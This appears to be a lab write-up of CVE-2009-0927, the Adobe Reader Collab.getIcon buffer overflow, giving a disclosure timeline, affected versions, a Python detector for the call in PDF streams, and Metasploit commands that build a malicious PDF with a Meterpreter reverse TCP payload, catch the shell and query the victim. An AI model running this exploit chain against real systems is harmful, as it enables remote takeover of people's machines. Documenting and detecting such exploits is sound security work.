CVE-2009-0927 : Adobe Acrobat Collab.getIcon Buffer Overflow

Timeline :

Vulnerability reported to ZDI by Tenable Network Security
Vulnerability reported by ZDI to the vendor on 2008-07-03
Coordinated advisory released on 2009-03-24
Metasploit PoC provided by HD Moore on 2009-03-28
Milw0rm PoC provided by Abysssec on 2009-05-04

PoC provided by :

MC
Didier Stevens
jduck

Reference(s) :

CVE-2009-0927

Affected version(s) :

Adobe Reader and Adobe Acrobat Professional 9.0.0
Adobe Reader and Adobe Acrobat Professional prior to version 8.1.4
Adobe Reader and Adobe Acrobat Professional prior to version 7.1.1

Tested on Windows XP SP3 with :

Adobe Reader 9.0.0

Description :

This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat. Affected versions include those prior to 7.1.1, prior to 8.1.3, and prior to 9.1. By creating a specially crafted PDF that contains a malformed Collab.getIcon() call, an attacker may be able to execute arbitrary code.
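
For triage on the defensive side, the check below (an added example, not part of the original post or of the Metasploit module) inflates each FlateDecode stream of a PDF and reports any reference to Collab.getIcon, the call named in the description. The function names and the sample PDF bytes are constructed for illustration; matching on the bare name is a heuristic assumption, and it will miss JavaScript that builds the name at run time or streams that use other filters.

```python
import re
import zlib

# Body of every PDF stream object (raw bytes between the two keywords).
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.DOTALL)
# The JavaScript call named in the advisory; whitespace around the dot is legal JS.
NEEDLE = re.compile(rb"Collab\s*\.\s*getIcon")


def inflate(data: bytes) -> bytes:
    """FlateDecode a stream body; return b'' when it is not zlib data."""
    try:
        # decompressobj tolerates a truncated or padded stream, unlike zlib.decompress
        return zlib.decompressobj().decompress(data)
    except zlib.error:
        return b""


def find_geticon(pdf: bytes) -> list[str]:
    """Return where a Collab.getIcon reference was found (empty list = none)."""
    hits = []
    if NEEDLE.search(pdf):  # uncompressed JavaScript anywhere in the file
        hits.append("raw")
    for index, match in enumerate(STREAM_RE.finditer(pdf)):
        if NEEDLE.search(inflate(match.group(1))):
            hits.append(f"stream {index} (FlateDecode)")
    return hits


def build_sample(js: bytes) -> bytes:
    """Constructed input: a minimal PDF-like blob holding one deflated JS stream."""
    body = zlib.compress(js)
    return (b"%PDF-1.4\n1 0 obj\n<< /Length " + str(len(body)).encode()
            + b" /Filter /FlateDecode >>\nstream\n" + body
            + b"\nendstream\nendobj\n%%EOF\n")


if __name__ == "__main__":
    # Constructed samples: one stream that references the call, one that does not.
    flagged = build_sample(b'var i = Collab.getIcon("sample.name");')
    clean = build_sample(b'app.alert("hello");')
    print("flagged:", find_geticon(flagged))
    print("clean:  ", find_geticon(clean))
```

A hit is a reason to quarantine the file and inspect the decoded JavaScript, not proof of exploitation; the fix remains upgrading to a patched Reader or Acrobat release.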

Commands :

use exploit/windows/fileformat/adobe_geticon
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sessions -i 1
sysinfo
getuid
ipconfig